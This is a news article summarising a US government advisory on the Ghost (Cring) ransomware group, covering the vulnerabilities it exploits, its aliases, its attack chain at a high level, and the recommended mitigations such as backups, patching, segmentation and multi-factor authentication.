US cybersecurity agencies have issued a warning about the Ghost ransomware group, also known as Cring, following investigations into its global impact. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have published an advisory detailing the ransomware’s tactics, techniques, and indicators of compromise (IOCs). The report highlights the group’s ability to exploit vulnerabilities in outdated software and firmware, leading to widespread disruptions across multiple sectors.
Since early 2021, Ghost ransomware actors have been breaching systems by targeting known security flaws that remain unpatched. The advisory states that more than 70 countries have been affected, including China. The group’s activities have compromised critical infrastructure, government networks, educational institutions, healthcare providers, technology firms, manufacturing companies, and small- to medium-sized businesses. The ransomware has been linked to operations originating in China, with attacks carried out for financial gain.
The advisory identifies vulnerabilities in internet-facing services as the primary entry point for Ghost ransomware. The group takes advantage of unpatched flaws in widely used systems, including Fortinet SSL VPN (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). Despite multiple warnings from cybersecurity firms, these vulnerabilities continue to be targeted, often due to delayed security updates or misconfigured systems.
The ransomware group frequently alters its attack methods, making attribution challenging. Operators rotate their malware executables, modify ransom notes, change encrypted file extensions, and use multiple email addresses for ransom communications. Over time, the group has been identified under various names, including Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Among the ransomware variants associated with Ghost attacks are Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
Tactics used in attacks and cybersecurity recommendations
Investigations into Ghost ransomware activity have revealed a pattern of attack that begins with credential theft, followed by the deployment of malicious tools to maintain access. Researchers first observed the ransomware when attackers were found using Mimikatz to extract credentials before deploying Cobalt Strike beacons for persistence. The ransomware payloads were then executed using Windows CertUtil, a legitimate certificate management tool, allowing attackers to bypass security detection mechanisms. The same vulnerabilities exploited by Ghost ransomware actors have also been used by state-backed hacking groups. Fortinet has repeatedly urged organisations to patch this vulnerability, issuing multiple advisories between 2019 and 2021.
In response to the ongoing threat, CISA, the FBI, and MS-ISAC have outlined mitigation measures. The advisory recommends that organisations implement regular system backups stored separately from primary networks to prevent attackers from encrypting critical data. Keeping software and firmware up to date is also advised, as unpatched systems remain the primary attack vector. Additionally, network segmentation is suggested to limit lateral movement within compromised environments and contain the impact of an attack. Further recommendations include enabling phishing-resistant multi-factor authentication (MFA) for privileged accounts and email services to prevent unauthorised access. Cybersecurity teams are also encouraged to monitor for signs of Ghost ransomware activity using the IOCs and detection methods detailed in the advisory.
Read more: CISA, FBI call for enhanced security in software product development process
